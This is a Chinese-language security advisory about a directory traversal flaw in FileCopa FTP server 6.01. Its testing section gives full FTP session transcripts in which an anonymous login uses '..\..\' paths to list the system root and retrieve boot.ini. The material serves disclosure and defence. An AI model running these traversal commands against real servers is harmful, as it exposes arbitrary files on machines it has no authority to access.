受影响系统:
InterVations FileCopa FTP server 6.01
描述:
FileCopa是一款自动化的FTP服务器软件。
FileCopa在下载文件时存在输入验证错误,远程攻击者可以通过目录遍历攻击泄露任意文件的内容。
<*来源:Pawel h0wl Wylecial
链接:http://secunia.com/advisories/42161/
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010
220 Trial Version. 30 days remaining
user anonymous
331 Password required for anonymous
pass asd
230 User anonymous logged in.
pasv
227 Entering Passive Mode (0,0,0,0,15,160)
list ..\..\
150 Opening ASCII mode data connection for file list
11-14-09 11:49PM 0 AUTOEXEC.BAT
11-14-09 11:43PM 211 boot.ini
04-15-08 01:00PM 4952 Bootfont.bin
11-07-10 04:45PM <DIR> Config.Msi
11-14-09 11:49PM 0 CONFIG.SYS
11-14-09 11:56PM <DIR> Documents and Settings
11-14-09 11:49PM 0 IO.SYS
11-14-09 11:49PM 0 MSDOS.SYS
04-15-08 01:00PM 47564 NTDETECT.COM
04-15-08 01:00PM 251152 ntldr
11-07-10 05:45PM 1610612736 pagefile.sys
11-07-10 04:47PM <DIR> Program Files
11-15-09 12:16AM <DIR> RECYCLER
11-14-09 11:53PM <DIR> System Volume Information
11-07-10 06:29PM <DIR> WINDOWS
226 Transfer complete.
220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010
220 Trial Version. 30 days remaining
user anonymous
331 Password required for anonymous
pass asd
230 User anonymous logged in.
pasv
227 Entering Passive Mode (0,0,0,0,15,160)
cwd ..\..\
250 CWD command successful.
retr boot.ini
150 Opening ASCII mode data connection for boot.ini (211 bytes)
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
226 Transfer complete.
建议:
厂商补丁:
InterVations
————
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。